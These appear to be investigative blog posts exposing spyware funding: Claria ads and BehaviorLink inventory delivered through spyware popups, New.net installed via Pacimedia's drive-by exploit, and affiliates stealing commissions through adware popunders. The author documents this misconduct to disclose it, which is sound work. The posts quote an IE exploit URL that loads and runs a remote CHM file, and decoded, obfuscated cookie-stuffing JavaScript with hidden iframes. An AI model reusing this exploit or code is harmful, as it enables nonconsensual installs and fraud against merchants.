Claria Shows Ads Through Exploit-Delivered Popups

Seeking to clean up its image, Claria has tried to distance itself from competing “adware” vendors — hiring a privacy officer, filing comments with the FTC, even setting up an anti-spyware site. It’s no surprise that Claria wants little to do with other vendors in this space: Other vendors’ entirely nonconsensual installations (1, 2, 3) are a magnet for criticism. These vendors even undercut Claria’s pricing — showing ads for as little as $0.015 per display, where Claria demands a minimum payment of $25,000 per ad campaign.

But despite Claria’s dislike of “spyware” vendors who install advertising software without any notion of user consent, Claria funds and supports such vendors in at least two distinct ways. First, Claria pays spyware vendors to show Claria’s own ads through their popups — thereby recruiting more users to install Claria’s advertising software. Second, Claria buys traffic from spyware vendors and uses this traffic to show ads for Claria’s advertiser clients — including merchants as reputable as Amazon.

So even as Claria reforms its own practices — improving its installation methods and scaling back its controversial popups — Claria is buying ads from others whose practices are far inferior.

Soliciting Installations through Spyware-Delivered Popups

At bottom-left, a Claria screensaver ad promoted by a Venus123 popup. The Venus123 popup was opened by spyware, which had become installed on a test PC without consent. The Venus123 popup is so large that it entirely covers the test PC's Start Menu and Taskbar.At bottom-left, a Claria screensaver ad shown within a Venus123 popup. The Venus123 popup was opened by ContextPlus, which had become installed on a test PC via a security exploit, without my consent. The Venus123 popup is so large that it entirely covers the test PC’s Start Menu and Taskbar.

    Claria    
(promoting installation of Claria “adware”)
money viewers
Zedo.com
(an ad network)
money viewers
02320.net
money viewers
Yieldmanager.com
(an ad network)
money viewers
Venus123.com
money viewers
ContextPlus
(spyware installed without consent)

The money trail — how funds flow from Claria to ad networks to spyware vendors (here, ContextPlus).

I have posted a series of pieces critiquing Claria’s installation methods — showing installations at kids sites, in tricky bundles, with substantively unreasonable license agreements. I haven’t recently seen the fake-user-interface Claria ads I wrote about previously — ads which encouraged users to install Claria by mimicking distinctive Windows dialog box formatting. But I am seeing Claria’s ads embedded within popups delivered by spyware — that is, delivered by advertising software installed on my test PC without my consent.

Consider the screenshot at right, showing the venus123.com site with a Claria screensaver ad at bottom-left. This venus123 ad was delivered to my test PC via ContextPlus spyware, which had become installed without my consent. ContextPlus sent traffic to clickandtrack.net which sent traffic to venus123.com. Then venus123.com embedded an ad from Yieldmanager.com, which in turn send traffic to 02320.net, which embedded an ad from Zedo.com, which finally sent the traffic on to Claria’s belnk.com server.

This ContextPlus-Claria ad display reflects an unusually lengthy series of relationships — summarized in the diagram at right. But the net effect is that Claria makes payments that ultimately flow back to ContextPlus — thereby funding spyware installed without consent. A partial URL log follows below, and I also retained a full packet log.

http://adchannel.contextplus.net/services/…
http://hits.clickandtrack.net/cgi-bin/hit?…
http://www.Venus123.com/homepage.precision…
http://ad.yieldmanager.com/imp?z=0&i=2578&…
http://ad.yieldmanager.com/iframe3?AAAAAAQ…
http://adchannel.02320.net/services/AdChan…
http://c5.zedo.com/jsc/c5/ff2.html?n=350;c…
http://c5.zedo.com/bar/v12-500/c5/jsc/ifra…
http://c4.zedo.com/ads2/d/2077/172/350/355…
http://c4.zedo.com//ads2/k/83990/2077/172/…
http://dist.belnk.com/4/placement/1461/?h=…

A Claria installation obtained through this ad may or may not be “consensual.” To reach a conclusion, we’d have to look at what follows when users click the ad — what they’re told about the advertising, privacy, and other relevant effects of installing Claria’s software. (Perhaps I’ll give these ads a close reading in the future, as I previously did for Claria’s fake-user-interface banner ads at kids sites.) But whether or not users ultimately consent to install Claria’s software, it’s troubling to see Claria using its purchasing power to support spyware installed without user consent.

Showing Advertisers’ BehaviorLink Ads through Spyware-Delivered Popups

An Amazon ad served through Claria BehaviorLink. The ad appears within Savings-card.com, a site which was opened in a popup by KVM Media, which had become installed on my test PC via a security exploit, without my consent.An Amazon ad served through Claria BehaviorLink within a popup from Savings-card.com. The Savings-card.com popup was opened by KVM Media, which had become installed on my test PC via a security exploit, without my consent.

Amazon
(and other BehaviorLink advertisers)
money viewers
Claria BehaviorLink
money viewers
Savings-Card.com
(and other sites buying traffic from spyware vendors)
money viewers
KVM Media
(spyware installed without consent)

The money trail — how funds flow from advertisers (here, Amazon) to spyware vendors, via Claria’s BehaviorLink service.

Claria’s funding of spyware (installed without consent) extends beyond Claria’s methods of obtaining new users for its software. Claria also purchases spyware-originated traffic on behalf of its advertiser customers.

In February 2005, Claria announced its new BehaviorLink advertising network. Unlike the controversial pop-ups of Claria’s GAIN — which have brought litigation from web publishers unhappy to see their sites covered by competitors’ popups — BehaviorLink will show ads within publishers’ sites, paying those publishers a share of Claria’s revenue. Viewed in the most favorable light, BehaviorLink would fund free software users want and would help support the sites users request — a winning offer for both users and web sites, Claria claims.

Is the truth as rosy as Claria’s promises? On some level it’s hard to know: Claria’s BehaviorLink says the service is in a “pilot,” and so far we’ve heard little from participating advertisers and publishers. Perhaps it’s too soon to say how well BehaviorLink will work.

But in my initial examination of BehaviorLink traffic, I see serious cause for concern. In particular, I have found that Claria is buying BehaviorLink ad inventory from web sites that receive traffic directly from some of the most notorious spyware, including spyware installed on users’ computers without notice or consent.

Consider the example at right. Savings-card.com buys traffic from KVM Media, which I have repeatedly observed install without notice or consent. So as users browse the web, KVM opens popups of Savings-card.com. But Savings-card.com, which in turns redirects users to Claria’s BehaviorLink. BehaviorLink them shows an ad from one of its partners. The example below at right shows an Amazon ad placed through BehaviorLink, arriving in exactly this way. See also a screenshot of the result of activating the View-Source menu command in the Savings-card popup. Below is a partial URL log showing traffic leading to the ad and (in the final entry) the result of clicking on the ad.

http://www.icannnews.com/cgi-bin/PopupV3?ID=…
http://www.savings-card.com/normal/yyy99.html
http://dist.belnk.com/4/placement/1968/
http://ath.belnk.com/placement/?cb=6747118&did=269085&pid=1968&mint128=343…
http://art.ath.belnk.com/4/creative/42514.1/content42514-0.html?at2=2&imp=…
http://www.amazon.com/exec/obidos/redirect?link_code=ure&camp=1789&tag=ce-…

Note that this popup appeared on a PC without BehaviorLink (or any other Claria software) installed. BehaviorLink’s web servers selected the Amazon ad randomly or on the basis of my other browsing on this test PC.

Claria’s Spyware-Delivered Advertising in Context

Claria’s own comments with the FTC concede that “spyware” is “illegal” under existing law to the extent that such software “is installed [on a consumer’s computer] without the consent of the consumer.” I agree. So Claria must be disheartened to find its ads and its clients’ ads shown through precisely this concededly-illegal software. I doubt that Claria intended to buy spyware-delivered advertising traffic. But by buying the cheapest available advertising space, Claria invited this result. Indeed, Claria’s BehaviorLink business model is premised on buying low-quality ads. Claria’s Scott Eagle told the New York Times in February: “We’ll take ad inventory that costs 50 or 75 cents, buy it in bulk, and turn it into gold by targeting $6 or $15 precision ads there. We’ll be the alchemists.” (cached copy)

To date, BehaviorLink has received strikingly positive press coverage. The media has largely accepted Claria’s promises — advertising software installed because users actually want it (not because they were tricked into accepting it, see above), and ads shown within high-quality partner web sites (not spyware-delivered popups). On the strength of these promises, it seems that Claria has been able to recruit remarkably high-quality advertisers like Amazon — advertisers who would not want to be associated with Claria’s traditional pop-ups.

My observations lead me to challenge these favorable assumptions about BehaviorLink. I still doubt whether users will install Claria’s software if Claria fully discloses the consequences of doing so (especially the effects on privacy). And the KVM Media example above shows BehaviorLink’s dependence on the quality of sites showing BehaviorLink ads. If Claria buys traffic from spyware vendors, directly or indirectly, then BehaviorLink ads get placed in spyware-delivered popups, not in web sites users actually want to visit. Then BehaviorLink ends up funding spyware, not funding the web sites users request.

Avoiding spyware-sourced traffic will require exceptional diligence on Claria’s part — inevitably driving up costs and reducing the profit margins Scott Eagle touted to the Times. I already have several more examples of BehaviorLink ads delivered in popups from exploit-installed spyware, and I’ll be watching for more.

Of course Claria is not the only network facing the problem of spyware-delivered ads. In May I examined more than 88,000 ads then served by 180solutions, finding that literally thousands flowed to or through major ad networks such as aQuantive’s AtlasDMT. These bogus syndication relationships remain widespread, as to popups served by 180solutions and numerous others. I’ve written a series of crawlers and robots to help me assess these problems — identifying which ad networks are involved, and identifying specific ad URLs that are affiliated with spyware vendors. But it’s a remarkably deep problem: Ads are passed from one ad network to another in ways that tend to confuse even my smartest crawlers. And ad networks have little incentive to investigate or stop these practices: They can only lose revenues by prohibiting such ads, so most networks seem to prefer to look the other way.

For now, spyware-delivered popups continue to promote many of the world’s leading merchants — including, thanks to Claria’s BehaviorLink, Amazon.com.

Video: New.net Installed through Security Holes

My last few posts have all covered spyware revenue sources (e.g. major advertisers, pay-per-click ads, and affiliate networks). But I always come back to poor installation practices as the core of the spyware problem. And nonconsensual installations continue to benefit surprisingly large vendors. Today’s focus: New.net.

Introduction to New.net

New.net provides a proprietary domain name system that allows it to sell nonstandard domain names to advertisers. These proprietary domains are resolved through New.net’s own servers, so these domains are accessible only to users whose ISPs have chosen to support New.net (few have), or to users with New.net’s client software installed on their PCs.

Despite major funding from Idealab, New.net hasn’t made a lot of friends. When New.net first announced its navigation DNS experts criticized New.net for breaking the namespace: In a New.net world, not all computers can reach all domain names. Internetnews called New.net an “end-run around ICANN,” and Internet Society staff worried of New.net causing “address collisions” by creating new domains that already exist elsewhere.

Facing so much criticism, New.net understandably sought to improve its image. But rather than changing its unpopular practices, New.net instead tried to silence its critics. In 2003, New.net sued Lavasoft, claiming false advertising and trade libel when Lavasoft detected New.net’s software and offered users an easy way to remove it. This wasn’t a clear win for New.net: Some of its claims were dismissed under anti-SLAPP rules, and in January 2005 New.net voluntarily dismissed its pending appeals. Then again, Lavasoft’s August 2004 change log reports removing signatures for New.net — suggesting that Lavasoft changed its classification of New.net to avoid further litigation. My Threats Against Spyware Critics table also reports New.net threats against CounterExploitation.

New.net’s Installation Practices — And an Example Nonconsensual Installation

A partial listing of programs installed via the Pacimedia exploit. A partial listing of programs installed via the Pacimedia exploit.

The Pacimedia exploit's first screen. Notice no disclosure of specific programs to be installed.
The Pacimedia exploit’s first screen. Notice no disclosure of specific programs to be installed. Notice no terms or conditions actually provided. Installation proceeds if a user presses “close this window” — without requiring that the user affirmatively indicate consent.

Another misleading New.net install -- disclosed via a one-word on-screen description ("New.net") without any explanation of function, purpose, or effect. Finding the New.net license agreement requires scrolling past 60+ pages of other vendors' licenses in the narrow box at right. Another misleading New.net install — disclosed via a one-word on-screen description (“New.net”) without any explanation of function, purpose, or effect. Finding the New.net license agreement requires scrolling past 60+ pages of other vendors’ licenses in the narrow box at right.

New.net finds itself little liked by experts on Internet infrastructure and security. But where are users in this mess? I’ve never spoken with a user who actually wanted New.net, but I’ve looked at plenty of massively-infected computers with New.net installed. So I’ve long suspected nonconsensual, improper, or overly aggressive installations of New.net software.

My suspicions have recently been borne out, because I have repeatedly observed New.net installed via security hole exploits. See this video, made on October 2 in my testing lab. From 0:00 to 0:55, I browse an ordinary web site, 4w-wrestling.com. At 1:07, my computer receives a security exploit — code from Pacimedia syndicated into 4w-wrestling via the Yieldmanager.com ad network. Nine minutes later, Pacimedia installed New.net onto my test machine. See video at 10:30-10:45. See also the top screenshot at right, showing the New.net folder (among others) newly added to my Program Files listing.

Did the Pacimedia installer get user consent to install New.net? Absolutely not. The Pacimedia exploit did show a screen (second image at right), in which it described software “available to be installed.” But nowhere did Pacimedia disclose what programs would be installed; Pacimedia called the software “a free browser enhancement” but gave no names of specific programs or functions. Pacimedia didn’t even link to a separate license, listing, or other document to explain what programs would be installed. Instead, Pacimedia’s installer oddly says users “agree to the terms and conditions stated here” — but neither states nor links to any terms or conditions.

As it turns out, unchecking the mysterious unlabeled checkbox would have prevented the installation of Pacimedia and its bundled programs. But a user cannot be said to have “agreed” to receive New.net (or other software) merely by failing to uncheck a box. And pressing a button labeled “close this window” does not grant consent to install numerous advertising programs.

Of course this isn’t New.net’s only sneaky installation. This spring I looked at eDonkey, which encourages users to install New.net via a pre-checked checkbox, giving New.net’s name and icon, but offering no description of New.net’s effects. Even if a user locates the New.net license — by scrolling through 60+ on-screen pages of other vendors’ licenses — the New.net license still doesn’t explain what New.net does or why a user might (or might not) want it. Such a user cannot reasonably be claimed to have “agreed” to run New.net software.

I’ve also seen New.net in big bundles with other P2P programs, screensavers, and similar. I retain detailed evidence on file. See also Eric Howes’ analysis of New.net as installed by the Good Luck Bear desktop theme — again lacking any explanation of what New.net does.

In its demand letters (e.g. pages 3-4 of its letter to CounterExploitation), New.net has claimed always to “provide[] very detailed download disclosures to all potential users” and to install only with users’ “explicit consent.” These are laudable goals, but they’re not just not achieved by New.net’s actual practices.

So New.net faces a product users don’t want; an Internet community that doesn’t like its core business or their installation tactics; and clear proof of its software installed without user consent. Yet paradoxically some anti-spyware vendors still don’t detect New.net or help users remove New.net software. See Eric Howes’ recent State of New.net Detections — finding that Webroot, Spyware Doctor, and Ad-Aware all fail even to detect New.net, while Microsoft recommends ignoring New.net and Spybot ignores New.net by default.

The Rest of Pacimedia’s Bundle

A 180solutions stub installer also shown during the course of the Pacimedia/New.net installation. Paradoxically, 180solutions installs even if users decline the installation in the stub. A 180solutions stub installer also shown during the course of the Pacimedia/New.net installation. Paradoxically, 180solutions installs even if users decline the installation in the stub.

New.net isn’t all that Pacimedia installs. In my testing, I saw programs installed from ConsumerAlertSystem, ContextPlus, eXact Advertising, Integrated Search Technologies, MediaAccess, Powerscan, SearchAccuracy, ShopAtHomeSelect, Sidefind, SurfSidekick, and YourSiteBar. All are shown in my installation video.

Pacimedia also installed 180 — despite my specific refusal to grant consent when asked. In the video at 7:09, 180 showed a stub installer popup, seeking user consent to install. (See screenshot at right.) I specifically declined 180’s offer. But a mere twelve minutes later, in the video at 19:18, a full copy of 180solutions nonetheless arrived on my test PC. So much for 180’s vaunted new “safe and secure” installation methods: Despite 180’s claims, it’s clear that their software still arrives without consent.

My video also shows the detrimental effects of these many added programs on my test machine: Midway through testing, I couldn’t even load Internet Explorer. Typical users would find it difficult to recover from such a large installation — their computers too badly encumbered even to download an anti-spyware program to begin to clean up the mess.

Though Pacimedia’s installation bundle changes over time, it’s striking how long Pacimedia has continued practices substantially matching what I saw this week. In testing of April 4, 2005, I received the same exploit and same dialog box shown above — even the same false claim that “you agree to the terms and conditions stated here,” with no conditions actually stated. Throughout this period, Pacimedia has received traffic through major ad networks (Yieldmanager.com, as well as Targetnet.com from Mamma Media (Nasdaq: MAMA)), has installed adware from large vendors including 180 and eXact (along with others, often including Direct Revenue), and has simultaneously shown a misleading ActiveX (see separate write-up). It’s hard to defend any of these practices. Yet somehow Pacimedia has continued apace for 6+ months.

For those interested in the technical details of Pacimedia’s security exploit: Pacimedia serves up a page with two IFRAMEs, one of them a reference to a doubly-encoded JavaScript (JScript.Encode followed by Unicode encoding). After decoding, inspection of that page reveals its use of an IE security vulnerability (discovered March 2004), allowing the execution of arbitrary code on a user’s PC. In particular, Pacimedia’s second IFRAME references a CHM, via syntax msits:mhtml:file://C:foo.mht!http://www.pacimedia.com/track//TRACK31.CHM::/track31.htm — telling IE to load the MHT file (Microsoft “web archive” format) at cfoo.mht, but if that file doesn’t exist (as it predictably does not), then to load www.pacimedia.com/track/track31.chm instead. (.CHM is a compiled help file, a format used by recent Windows help.) IE follows these instructions — ultimately loading and running the code within track31.chm. In this way, Pacimedia’s code obtains full control over users’ computers, despite users never granting consent. This vulnerability was cured in Microsoft patches posted in 2004, but empirical analysis of infected PCs shows that many PCs remain unpatched and vulnerable.

How Affiliate Programs Fund Spyware updated September 15, 2005

Affiliate networks offer an appealing promise for supporting free, independent content on the web: Any ordinary user can sign up to promote any interested merchant via a special affiliate tracking link. When a user clicks the link and makes a purchase from the merchant, the referring web site (“affiliate”) gets a payment from the merchant. Since merchants only pay affiliates when users actually make purchases, merchants feel free to partner with smaller affiliate sites — sites that might otherwise be too small or quirky to get advertisers’ attention. See one merchant’s diagram of the canonical affiliate relationship.

Despite the promise of affiliate marketing, haphazard marketing arrangements entail serious risks. If merchants sign up affiliates without investigation or monitoring, merchants risk accepting partners with undesirable business practices. Consider an affiliate who sends spam, or whose site is so controversial that no reasonable merchant would want to be seen there. So, experienced merchants have learned, they must monitor their affiliates for these kinds of dubious behaviors.

    Affiliate Merchants    
(i.e. Dell, Gateway, eLuxury, J&R)    
money viewers
Affiliate Networks
(i.e. LinkShare, Commission Junction)
money viewers
Affiliates
money viewers
Spyware Vendors
(i.e. 180solutions, Direct Revenue, eXact Advertising)

The money trail – how funds flow from merchants to affiliate networks to affiliates to spyware vendors.

Even more serious for most merchants, some affiliates promote merchants via unwanted advertising software — “spyware.” Some affiliates cause merchants’ ads to cover competitors’ sites — a merchant’s ad might appear through spyware without the merchant knowing about, intending, or requesting this result. Worse, affiliates can use spyware to steal commissions they haven’t earned — making tracking systems think users arrived at a merchant’s site via an affiliate link, when users actually just typed in a merchant’s domain name (such that no commission should be paid).

Because any affiliate can pay a spyware vendor to open the affiiliate’s links in spyware-delivered popups, catching these affiliates is not a trivial task. Enforcement cannot merely examine on affiliates’ names or stated practices: Affiliates’ names will not generally match the names of known “adware” vendors, and rogue affiliates are unlikely to describe their practices truthfully in their affiliate network applications. Instead, enforcement must entail actual examination of affiliates’ behavior — examination that most merchants and networks appear ill-equipped to perform.

There have been numerous reports of affiliates buying traffic from spyware — reports on my site (1, 2, 3, 4, 5) and elsewhere (1, 2, 3, 4). But to date, affiliate networks have failed to make substantial progress at stopping affiliate-spyware scams: These practices continue, affecting merchants with all major affiliate networks.

This piece proceeds in three parts. First, I show five specific examples of particular affiliates currently employing spyware to claim affiliate commissions, in apparent violation of applicable rules. (1, 2, 3, 4, 5) Second, I offer recommendations to concerned merchants. I conclude with recommendations for networks — suggesting technology and policy to stop this problem in the long run.

Example: Unknown Commission Junction Affiliate Targeting Dell with Gateway Popunders via Direct Revenue

A popunder promoting Gateway, purchased from Direct Revenue by a rogue affiliate. If a user ultimately makes a purchase from Gateway, the popunder causes Gateway to pay commissions to the affiliate, via Commission Junction. Gateway pays these commissions even though it did not know of or approve the affiliate's decision to place advertising with Direct Revenue. A popunder promoting Gateway, purchased from Direct Revenue by a rogue affiliate. If a user ultimately makes a purchase from Gateway, the popunder causes Gateway to pay commissions to the affiliate, via Commission Junction. Gateway pays these commissions even though it did not know of or approve the affiliate’s decision to place advertising with Direct Revenue.

When users visit Dell.com on PCs infected with Direct Revenue, users may receive Gateway popunders. See screenshot at right, showing the Gateway popunder in a window marked Aurora (a Direct Revenue product name).

This advertising for Gateway does not occur because Gateway has requested that Direct Revenue advertise Gateway when users visit Dell’s site. Rather, a Gateway affiliate has purchased these ads. If a user subsequently makes a purchase from Gateway, the affiliate gets a commission, and these commissions let the affiliate pay Direct Revenue for showing the ad in the first place.

The ad at right is loaded via the following excerpted DirectRevenue targeting code (as recorded by my network monitor / packet sniffer). Yellow highlighting marks the targeting (to dell.com), while red highlighting marks the affiliate ID number and green highlighting marks the command to open the popunder. Extraneous code is omitted for brevity.

GET /imp/servlet/ImpServe?urlContext=http%3A%2F%2Fwww.dell.com%2F&domainContext=dell.com … HTTP/1.1

Host: xadsj.offeroptimizer.com …
 
HTTP/1.1 200 OK…
<BODY>
<title>—</title>
<SCRIPT LANGUAGE=”JavaScript”>

url=”http://service.bfast.com/bfast/click?bfmid=37919389&siteid=41294023 &bfpage=bf_advanced&bfurl=http%3A%2F%2Fwww.gateway.com%2Fhome”;

winad=window.open(url, “_blank”, attrib);

This action by the Gateway affiliate violates multiple Commission Junction policies: Direct Revenue software sometimes installs invisibly and without consent. Direct Revenue-delivered affiliate popups constitute forced clicks, invoking affiliate links without any affirmative end user action. The affiliate at issue is buying traffic from adware it did not design and does not control. The affiliate’s behavior also serves to overwrite cookies set by other affiliates, reducing others’ commissions. Each of these behaviors violates CJ’s Publisher Code of Conduct.

Example: Unknown Commission Junction Affiliate Targeting Dell via Direct Revenue

A popunder of Dell, purchased by a rogue affiliate and delivered via Direct A popunder of Dell, purchased by a rogue affiliate and delivered via Direct Revenue as a user browses Dell.com. If a user ultimately makes a purchase from Dell, the popunder causes Dell to pay commission to the affiliate, via Commission Junction. So Dell ends up paying affiliate commissions even when users have requested its site specifically and by name — a situation that would not otherwise entail paying affiliate commission.

When users visit Dell.com on PCs infected with Direct Revenue, users may receive Dell popunders. See screenshot at right, showing such a popunder.

Here again, a rogue affiliate has placed ads through spyware — again without the merchant’s knowledge or approval. But notice the difference: In the Gateway example (above), the popup ad promoted a competitor of the site the user requested, whereas here the ad promotes the same site the user had already requested. What’s going on? Targeting Dell with Dell’s own affiliate link reveals an affiliate’s understanding that a user at Dell.com would probably most prefer to purchase from Dell, not Gateway. So the affiliate opens a Dell affiliate link — setting cookies such that if the user ultimately does purchase from Dell, the affiliate will get a commission. But the affiliate did nothing to facilitate the purchase or to fairly earn a commission; the users was already at Dell.com! Beyond cheating Dell, this affiliate also violated the CJ Publisher Code of Conduct for the reasons set out in the prior example.

Direct Revenue targeting code follows. Yellow highlighting marks the targeting (to dell.com), while red highlighting marks the affiliate ID number and green highlighting marks the command to open the popunder.

GET /imp/servlet/ImpServe?urlContext=http%3A%2F%2Fwww.dell.com%2Fcontent%2Fdefault.aspx%3Fc%3Dus%26cs%3D19%26l%3Den%26s%3Ddhs&domainContext=dell.com … HTTP/1.1

Host: xadsj.offeroptimizer.com

 
HTTP/1.1 200 OK

<BODY>
<title>—</title>
<SCRIPT LANGUAGE=”JavaScript”>

url=”http://service.bfast.com/bfast/click?bfmid=37628499&siteid=41115962&bfpage=banner1″;

winad=window.open(url, “_blank”, attrib);

Example: Unknown LinkShare Affiliate Targeting eLuxury via 180solutions

A popunder of Dell, purchased by a rogue affiliate and delivered via Direct A ‘double’ popup of eLuxury.com, purchased by a rogue affiliate and delivered via 180solutions as a user browses eLuxury. The popup claims commissions from eLuxury, via LinkShare, if a user ultimately makes a purchase from eLuxury. So eLuxury ends up paying affiliate commissions even when users have requested its site specifically and by name — a situation that would not otherwise entail paying affiliate commission.

When users visit eLuxury.com on PCs infected with 180solutions, users may receive popunders of the eLuxury site as reached through affiliate links. See screenshot at right, showing such a popup. Notice the resulting duplicate entries in the status bar (flagged at A), the creation of LinkShare cookies (B), and the second window just barely visible behind the new popup (C). (The usual 180solutions branding (in the browser title bar) was erased in the course of the LinkShare redirect.) See also a video of this popup, which presents the duplicate window particularly clearly.

As in the preceding examples, this affiliate has purchased ads through spyware — targeting the merchant’s web site with its own affiliate links. If a user browses to eLuxury on an infected computer, receives this popup, and makes a purchase, tracking systems at eLuxury and LinkShare will indicate that the affiliate has earned a commission — though in fact the affiliate did nothing to facilitate the purchase.

This affiliate’s actions entail multiple violations of the LinkShare Shopping Technologies Addendum (PDF). The affiliate has altered the user’s access, view, and usage of the merchant’s site, in violation of requirement 1.(i). The affiliate has purchased network traffic keyed to particular keywords in users’ requests, in violation of provision 6.5.(ii). Furthermore, 180solutions can trigger on traffic originating with other affiliates, thereby reducing their commissions in violation of 1.(ii).

180solutions targeting code follows, as observed via my network monitor. Yellow highlighting marks the targeting (to dell.com), while red highlighting marks the affiliate ID number.

POST /showme.aspx?keyword=eluxury&…

Host: tv.180solutions.com

 
HTTP/1.1 200 OK

<HTML>

ad_url: <input id=ad_url name=ad_url value=http://click.linksynergy.com/fs-bin/click?id=DSOXp2QDjbg&amp;offerid=31266.10000067&amp;type=4&amp;subid=0>

Example: MyGeek (LinkShare Affiliate) Targeting J&R via Direct Revenue

A popunder of J&R, purchased by MyGeek and delivered via Direct Revenue as a user browses jr.com. If a user ultimately makes a purchase from J&R, the popunder causes J&R to pay commission to the affiliate, via LinkShare. So J&R ends up paying affiliate commissions even when users have requested its site specifically and by name -- a situation that would not otherwise entail paying affiliate commission. A popunder of J&R, purchased by MyGeek and delivered via Direct Revenue as a user browses jr.com. If a user ultimately makes a purchase from J&R, the popunder causes J&R to pay commission to the affiliate, via LinkShare. So J&R ends up paying affiliate commissions even when users have requested its site specifically and by name — a situation that would not otherwise entail paying affiliate commission.

When users visit jr.com on PCs infected with Direct Revenue, users may receive J&R popunders. See screenshot at right, showing such a popunder.

Like the examples above, the popunder here is a popunder of the merchant’s own affiliate link — designed to claim affiliate commission from purchases that would have occurred even without the popunder. But here the popunder targeting is routed through an intermediary, MyGeek. Direct Revenue targeting code reveals what is occurring: First Direct Revenue opens a popunder (green highlighting) of a MyGeek URL (blue) (referencing MyGeek via IP address 66.179.234.169, which Whois confirms is indeed a MyGeek host). Then MyGeek redirects to LinkShare (red).

GET /a/Drk.syn?adcontext=http://www.jr.com/images/cart/btn_proceed_to_scheckout.gif& … HTTP/1.1

Host: btg.btgrab.com

 
HTTP/1.1 200 OK

adurl=http://66.179.234.169/cpv.jsp?s=7453&c=53491&p=110077&adultfilter=on&aid=586& …

 
 
GET /cpv.jsp?s=7453&c=53491&p=110077&adultfilter=on&aid=586& …

Host: 66.179.234.169

 
HTTP/1.1 302 Found

Location: http://click.linksynergy.com/fs-bin/stat?id=OAfBJvRKlyk&offerid=58654

That MyGeek performs such targeting is not entirely unknown. See a recent discussion at ABestWeb, with multiple participants reporting such observations. See also a cached MyGeek page (Google Cache copy, local copy) disclosing 180solusions and “OfferOptimizer” (Direct Revenue) as syndication partners. Nonetheless, MyGeek’s use of LinkShare affiliate links seems to entail multiple violations of LinkShare rules, exactly as set out in the preceding section.

Example: Wholesalingonline (LinkShare Affiliate) Targeting Hickory Farms via eXact Advertising

A popunder of Wholesalingonline.com, delivered by eXact Advertising's BullsEye as a user browses hickoryfarms.com. The Wholesalingonline popunder uses tricky cookie-stuffing methods to set Hickoryfarms cookies automatically. So if a user ultimately makes a purchase from Hickory Farms, the popunder causes Hickory Farms to pay commission to Wholesalingonline, via LinkShare. So Hickory Farms ends up paying affiliate commissions even when users have requested its site specifically and by name -- a situation that would not otherwise entail paying affiliate commission. A popunder of Wholesalingonline.com, delivered by eXact Advertising’s BullsEye as a user browses hickoryfarms.com. The Wholesalingonline popunder uses tricky cookie-stuffing methods to set Hickoryfarms cookies automatically. So if a user ultimately makes a purchase from Hickory Farms, the popunder causes Hickory Farms to pay commission to Wholesalingonline, via LinkShare. So Hickory Farms ends up paying affiliate commissions even when users have requested its site specifically and by name — a situation that would not otherwise entail paying affiliate commission.

When users visit hickoryfarms.com on PCs infected with eXact Advertising, users may receive Wholesalingonline.com popunders. See screenshot at right, showing such a popunder.

At first glance, the Wholesalingonline popunder looks innocuous — just a random web site hoping to reach visitors who requested Hickory Farms. But the Wholesalingonline page at issue is specifically designed to set Hickory Farms affiliate cookies, despite the lack of any visible Hickory Farms content within the site. (For background on such practices, see my cookie-stuffing page, reporting dozens of such examples, all occurring without the use of spyware or adware.)

The Wholesalingonline page at issue sets cookies in the following way: First, Wholesalingonline delivers a page of encoded gibberish JavaScript, instructing use of the JavaScript “unescape” command to recover JavaScript code from hex-encoded ASCII. A snipped of the encoded original:

<HTML><HEAD><TITLE>Cut Out the Middle Man with Warehousing Direct</TITLE><SCRIPT type=”text/javascript”><!–
document.write(unescape(“%3C%53%43%52%49%50%54%20%74%79%70%65%3D%22%74%65%78%74%2F%6A …

Decoding this block of code yields the following secondary decoder function, “q()”

<SCRIPT type=”text/javascript”><!– function q(s){var o=””,a=new Array(),w=””,e=0;for(i=0;i<s.length;i++){c=s.charCodeAt(i);c=c^30;w+=String.fromCharCode(c);if(w.length>80){a[e++]=w;w=””}}o=a.join(“”)+w;return o}//–></SCRIPT>

Using the q() function to decode the remainder of the page yields the following HTML contents:

<frameset rows=”0,100%” onLoad=”top.mainFrame.location=’http://www.wholesalingonline.com’ …>
<frame src=”http://208.55.59.48/41128/268749.htm” …>
<frame src=”about:blank” …>

Notice that the page creates a frameset with two rows. The first, suspiciously set to be invisible (0 pixels in height), loads content from a server at 208.55.59.48. The second, the only visible frame, loads the wholesalingonline.com home page.

Sure enough, my packet sniffer confirms that the 208.55.59.48 page was indeed loaded immediately thereafter. That page offers an extremely lengthy (88KB) encoded JavaScript of its own, but decoding reveals the cookie-stuffing code copied below. Yellow highlighting flags the creation of an array of LinkShare affiliate links (IDs in red). Green highlighting flags random selection of a one of the affiliate links (chosen based on the current time). Finally, an IFRAME (blue) embeds the affiliate link within the page — thereby invoking the affiliate link and setting cookies accordingly.

link = new initArray(
“http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000190&type=3&subid=0″,
“http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000190&type=3&subid=0″,
“http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000171&type=3&subid=0″,
“http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000148&type=3&subid=0″,
“http://click.linksynergy.com/fs-bin/click?id=7o6currJnHbjuWM&offerid=6562.10000036&type=3&subid=0″,
“http://click.linksynergy.com/fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000190&type=3&subid=0″
);
 
var currentdate = new Date();
var core = currentdate.getSeconds() % link.length;
var ranlink = link[core];
 
document.write(‘<DIV align=center><IFRAME SRC=”‘ +ranlink+ ‘” WIDTH=0 HEIGHT=0 FRAMEBORDER=0 scrolling=”no”></IFRAME></a></DIV>’);

Examination of my packet log confirms that a LinkShare affiliate link was ultimately invoked in exactly the way that this code specifies. Notice HTTP Referer header, bearing the suspect 208.55.59.48 referring URL identified above (green).

GET /fs-bin/click?id=7o6JnHbjuWM&offerid=6562.10000036&type=3&subid=0 HTTP/1.1

Referer: http://208.55.59.48/41128/268749.htm

Wholesalingonline’s methods are clearly more sophisticated than the other affiliates shown above; the multiple levels of encoding, obfuscation, framesets, randomization, and other trickery reveal Wholesalingonline’s desire not to get caught. But ultimately Wholesalingonline’s strategy is identical to the others: To make a merchant’s tracking system think that a user arrived at a merchant through its affiliate tracking link, such that a commission should be paid, when in fact no such commission is in order.

Additional Examples

I have been documenting examples of this behavior since spring 2004, and I have literally hundreds of examples on file, reflecting targeting of most major affiliate merchants. The examples above happen to focus on targeting using notorious advertising software from Direct Revenue, 180solutions, and eXact Advertising, but similar targeting remains widespread using pop-ups from ContextPlus, Kvmedia, and numerous others.

What Merchants Should Do

